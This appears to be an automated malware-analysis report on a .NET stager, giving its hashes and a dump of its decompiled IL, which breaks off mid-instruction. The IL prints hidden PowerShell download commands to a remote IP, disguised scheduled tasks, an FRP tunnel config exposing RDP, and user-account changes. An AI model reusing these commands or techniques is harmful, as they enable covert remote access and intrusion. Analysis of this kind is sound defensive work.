ec5feaf68695c6cb51efbf737a240f62
PE Executable | MD5: ec5feaf68695c6cb51efbf737a240f62 | Size: 23.55 KB | application/x-dosexec
Symbol Obfuscation Score
| Hash | Hash Value |
|---|---|
| MD5 | ec5feaf68695c6cb51efbf737a240f62 |
| Sha1 | efd58a42ed9e121476535e91df59543464d6d067 |
| Sha256 | 41a99b0b2be00bc85f875c310dea544492e54889414c8c45b951d3dbdd58c270 |
| Sha384 | 24d01f508487c33d06af7870872618f21c67911d5e53fac0c67819d392487fab37c90ee79ba29c273fbba6ec2e82e149 |
| Sha512 | 795c902ab9320a831fb39da3571909cf1ace17eb7a65742ced514c3cf6aeb5c0b11940d882bdb40e60b5156ff803c06cc41190848b91ec129bc2a48c1df97e60 |
| SSDeep | 384:T6aYyubblBlG0HIgyvdYR8AlaUL5yfgxDYOXD8acwS4L6:ivb1GWIgy6RTFNDYOXD8am |
| TLSH | EDB23E01BBE80518F6FF5F3659B52A904A77BC9A2E35C55E0D42418E0C75BA0DEA0F37 |

PeID
| Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | vhhqjwoq.zfo.exe |
| Full Name | vhhqjwoq.zfo.exe |
| EntryPoint | System.Void StandaloneProgram.Program::Main() |
| Scope Name | vhhqjwoq.zfo.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v2.0.50727 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | vhhqjwoq.zfo |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 218 |
| Main Method | System.Void StandaloneProgram.Program::Main() |
| Main IL Instruction Count | 1155 |
| Main IL | ldnull <null> stloc.0 <null> call System.Int32 StandaloneProgram.Program::DetermineIntegrity() stsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un.s IL_001E: ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4 20000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt.s IL_0050: ldstr "C:\\Temp" ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> beq.s IL_0035: ldstr "Global\\SystemStagerMutex" ldstr Global\AdminStagerMutex br.s IL_003A: stloc.s V_7 ldstr Global\SystemStagerMutex stloc.s V_7 ldc.i4.1 <null> ldloc.s V_7 ldloca.s V_8 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc.0 <null> ldloc.s V_8 brtrue.s IL_0050: ldstr "C:\\Temp" leave IL_0D96: ret ldstr C:\Temp dup <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldstr log{0}.txt ldsfld System.Int32 StandaloneProgram.Program::integrity box System.Int32 call System.String System.String::Format(System.String,System.Object) call System.String System.IO.Path::Combine(System.String,System.String) stsfld System.String StandaloneProgram.Program::logFile ldstr Determined integrity level: {0} (4=SYSTEM,3=Admin,2=User) ldsfld System.Int32 StandaloneProgram.Program::integrity box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr http://185.102.115.146:81 stloc.1 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr http:// ldstr callvirt System.String System.String::Replace(System.String,System.String) ldstr https:// ldstr 
callvirt System.String System.String::Replace(System.String,System.String) ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 47 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> stloc.2 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr /hosted/RDPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.3 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr /hosted/FRPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_4 ldc.i4.0 <null> stloc.s V_5 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.0 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_10 ldloc.s V_10 brfalse.s IL_0162: leave.s IL_0170 ldloc.s V_10 ldstr IconSizeVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) brfalse.s IL_0162: leave.s IL_0170 ldc.i4.1 <null> stloc.s V_5 ldstr RDPWrapper already exists in HKLM, skipping download ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0170: ldloc.s V_5 ldloc.s V_10 brfalse.s IL_016F: endfinally ldloc.s V_10 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_5 brtrue IL_01FC: ldc.i4.0 ldstr Downloading RDPWrapper... 
ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',$true).SetValue('IconSizeVersion1',(iwr ' ldloc.3 <null> ldstr ').Content,[Microsoft.Win32.RegistryValueKind]::Binary); call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_11 ldstr Running download command: ldloc.s V_11 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr powershell ldstr -w Hidden -Command " ldloc.s V_11 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() ldstr RDPWrapper downloaded to HKCU ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_01FC: ldc.i4.0 stloc.s V_12 ldstr Error downloading RDPWrapper: {0} ldloc.s V_12 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_01FC: ldc.i4.0 ldc.i4.0 <null> stloc.s V_6 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.0 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_13 ldloc.s V_13 brfalse.s 
IL_0231: leave.s IL_023F ldloc.s V_13 ldstr IconUnderlineVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) brfalse.s IL_0231: leave.s IL_023F ldc.i4.1 <null> stloc.s V_6 ldstr FRP binary already exists in HKLM, skipping download ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_023F: ldloc.s V_6 ldloc.s V_13 brfalse.s IL_023E: endfinally ldloc.s V_13 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_6 brtrue IL_02CC: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Downloading FRP binary... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',$true).SetValue('IconUnderlineVersion1',(iwr ' ldloc.s V_4 ldstr ').Content,[Microsoft.Win32.RegistryValueKind]::Binary); call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_14 ldstr Running FRP download command: ldloc.s V_14 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr powershell ldstr -w h -c " ldloc.s V_14 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() ldstr FRP binary downloaded to HKCU ldc.i4.1 <null> call System.Void 
StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_02CC: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_15 ldstr Error downloading FRP binary: {0} ldloc.s V_15 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_02CC: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.2 <null> bne.un.s IL_0319: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Not admin/system, escalating privileges... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.0 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) call System.Diagnostics.Process StandaloneProgram.Program::RunAsAdmin(System.String) pop <null> ldstr Escalation attempted ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_0D96: ret stloc.s V_16 ldstr Error in escalation: {0} ldloc.s V_16 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_0D96: ret ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt IL_04EE: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_17 ldloc.s V_17 brfalse.s IL_0396: leave.s IL_03A4 ldloc.s V_17 ldstr ShellStateVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_18 ldloc.s V_18 brfalse.s IL_0396: leave.s IL_03A4 ldsfld 
Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_19 ldloc.s V_19 brfalse.s IL_0388: leave.s IL_0396 ldloc.s V_19 ldstr ShellStateVersion1 ldloc.s V_18 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_17 ldstr ShellStateVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved implant data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0396: leave.s IL_03A4 ldloc.s V_19 brfalse.s IL_0395: endfinally ldloc.s V_19 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_03A4: leave.s IL_03BC ldloc.s V_17 brfalse.s IL_03A3: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_03BC: nop stloc.s V_20 ldstr Error moving registry data: {0} ldloc.s V_20 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_03BC: nop nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_21 ldloc.s V_21 brfalse.s IL_042F: leave.s IL_043D ldloc.s V_21 ldstr IconSizeVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_22 ldloc.s V_22 brfalse.s IL_042F: leave.s IL_043D ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt 
Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_23 ldloc.s V_23 brfalse.s IL_0421: leave.s IL_042F ldloc.s V_23 ldstr IconSizeVersion1 ldloc.s V_22 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_21 ldstr IconSizeVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved RDPWrapper data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_042F: leave.s IL_043D ldloc.s V_23 brfalse.s IL_042E: endfinally ldloc.s V_23 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_043D: leave.s IL_0455 ldloc.s V_21 brfalse.s IL_043C: endfinally ldloc.s V_21 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0455: nop stloc.s V_24 ldstr Error moving RDPWrapper data: {0} ldloc.s V_24 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0455: nop nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_25 ldloc.s V_25 brfalse.s IL_04C8: leave.s IL_04D6 ldloc.s V_25 ldstr IconUnderlineVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_26 ldloc.s V_26 brfalse.s IL_04C8: leave.s IL_04D6 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_27 ldloc.s V_27 brfalse.s IL_04BA: leave.s IL_04C8 ldloc.s 
V_27 ldstr IconUnderlineVersion1 ldloc.s V_26 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_25 ldstr IconUnderlineVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved FRP data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_04C8: leave.s IL_04D6 ldloc.s V_27 brfalse.s IL_04C7: endfinally ldloc.s V_27 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_04D6: leave.s IL_04EE ldloc.s V_25 brfalse.s IL_04D5: endfinally ldloc.s V_25 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_04EE: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_28 ldstr Error moving FRP data: {0} ldloc.s V_28 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_04EE: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt IL_05A9: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr C:\ProgramData\frp stloc.s V_29 ldloc.s V_29 ldstr frpc.toml call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_30 ldloc.s V_29 call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_053E: ldloc.s V_30 ldloc.s V_29 call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.s V_29 newobj System.Void System.IO.DirectoryInfo::.ctor(System.String) dup <null> callvirt System.IO.FileAttributes System.IO.FileSystemInfo::get_Attributes() ldc.i4.2 <null> or <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) ldstr FRP directory created and hidden ldc.i4.1 <null> call System.Void 
StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_30 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_0591: leave.s IL_05A9 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr serverAddr = " stelem.ref <null> dup <null> ldc.i4.1 <null> ldloc.2 <null> stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr " serverPort = 7000 loginFailExit = false auth = { method = "token", token = "ADAD" } user = " stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String System.Environment::get_UserName() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " [[proxies]] name = "rdp" type = "tcp" localIP = "127.0.0.1" localPort = 3389 remotePort = 0 stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_31 ldloc.s V_30 ldloc.s V_31 callvirt System.String System.String::Trim() call System.Void System.IO.File::WriteAllText(System.String,System.String) ldstr FRP config created ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_05A9: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_32 ldstr Error setting up FRP: {0} ldloc.s V_32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_05A9: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_062F: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Admin detected, creating service... 
ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.1 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) stloc.s V_33 ldstr DriverSvcTask ldstr Driver Support Service ldloc.s V_33 ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr NetTcpSvc ldstr Manages network TCP connections for system services. ldc.i4.1 <null> ldstr IconUnderlineVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr TermSvcHost ldstr Provides support for Terminal Services. ldc.i4.1 <null> ldstr IconSizeVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) leave IL_06AF: nop stloc.s V_34 ldstr Error setting up autorun and task: {0} ldloc.s V_34 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_06AF: nop ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un.s IL_06AF: nop ldstr System detected, ensuring tasks exist... 
ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.1 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) stloc.s V_35 ldstr DriverSvcTask ldstr Driver Support Service ldloc.s V_35 ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr NetTcpSvc ldstr Manages network TCP connections for system services. ldc.i4.1 <null> ldstr IconUnderlineVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr TermSvcHost ldstr Provides support for Terminal Services. ldc.i4.1 <null> ldstr IconSizeVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) leave.s IL_06AF: nop stloc.s V_36 ldstr Error ensuring tasks exist: {0} ldloc.s V_36 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_06AF: nop nop <null> newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor() stloc.s V_37 ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_06D0: ldsfld System.Int32 StandaloneProgram.Program::integrity ldloc.s V_37 call System.String System.Environment::get_UserName() callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) br IL_075B: ldc.i4.0 ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un IL_075B: ldc.i4.0 ldstr S-1-5-32-555 call System.Collections.Generic.List`1<System.String> 
StandaloneProgram.Program::GetLocalGroupMembers(System.String) callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_41 br.s IL_0742: ldloca.s V_41 ldloca.s V_41 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_42 ldloc.s V_42 stloc.s V_43 ldloc.s V_42 ldc.i4.s 92 callvirt System.Int32 System.String::LastIndexOf(System.Char) stloc.s V_44 ldloc.s V_44 ldc.i4.0 <null> blt.s IL_0725: ldloc.s V_43 ldloc.s V_44 ldc.i4.1 <null> add <null> ldloc.s V_42 callvirt System.Int32 System.String::get_Length() bge.s IL_0725: ldloc.s V_43 ldloc.s V_42 ldloc.s V_44 ldc.i4.1 <null> add <null> callvirt System.String System.String::Substring(System.Int32) stloc.s V_43 ldloc.s V_43 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0742: ldloca.s V_41 ldloc.s V_37 ldloc.s V_43 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Contains(System.String) brtrue.s IL_0742: ldloca.s V_41 ldloc.s V_37 ldloc.s V_43 callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) ldloca.s V_41 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_06EE: ldloca.s V_41 leave.s IL_075B: ldc.i4.0 ldloca.s V_41 constrained. 
System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.0 <null> stloc.s V_38 ldstr SysMaintenance stloc.s V_39 ldloc.s V_37 callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_41 br IL_09D5: ldloca.s V_41 ldloca.s V_41 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_45 ldstr Attempting to configure user: ldloc.s V_45 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr net ldstr user " ldloc.s V_45 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_46 ldloc.s V_46 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() ldloc.s V_46 callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.s V_39 callvirt System.Boolean System.String::Contains(System.String) brfalse.s IL_0806: leave.s IL_0814 ldstr Skipping user ldloc.s V_45 ldstr due to description containing ldloc.s V_39 call System.String 
System.String::Concat(System.String,System.String,System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_09D5: ldloca.s V_41 leave.s IL_0814: ldstr "net" ldloc.s V_46 brfalse.s IL_0813: endfinally ldloc.s V_46 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr net ldstr user " ldloc.s V_45 ldstr " "" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_47 ldloc.s V_47 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_48 ldloc.s V_47 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardError() callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_49 ldloc.s V_47 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr net user output: ldloc.s V_48 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr net user error: ldloc.s V_49 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void 
StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_47 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() ldc.i4 8646 bne.un.s IL_08C0: ldloc.s V_47 ldstr Microsoft account detected, creating new local user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.0 <null> stloc.s V_38 leave IL_09E1: leave.s IL_09F1 ldloc.s V_47 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() brfalse.s IL_08CE: leave.s IL_08DC leave IL_09D5: ldloca.s V_41 leave.s IL_08DC: ldsfld System.Int32 StandaloneProgram.Program::integrity ldloc.s V_47 brfalse.s IL_08DB: endfinally ldloc.s V_47 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_093D: ldstr "gpupdate" ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-555') -Member ' ldloc.s V_45 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_50 ldloc.s V_50 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_093D: ldstr "gpupdate" ldloc.s V_50 brfalse.s IL_093C: endfinally ldloc.s V_50 callvirt System.Void 
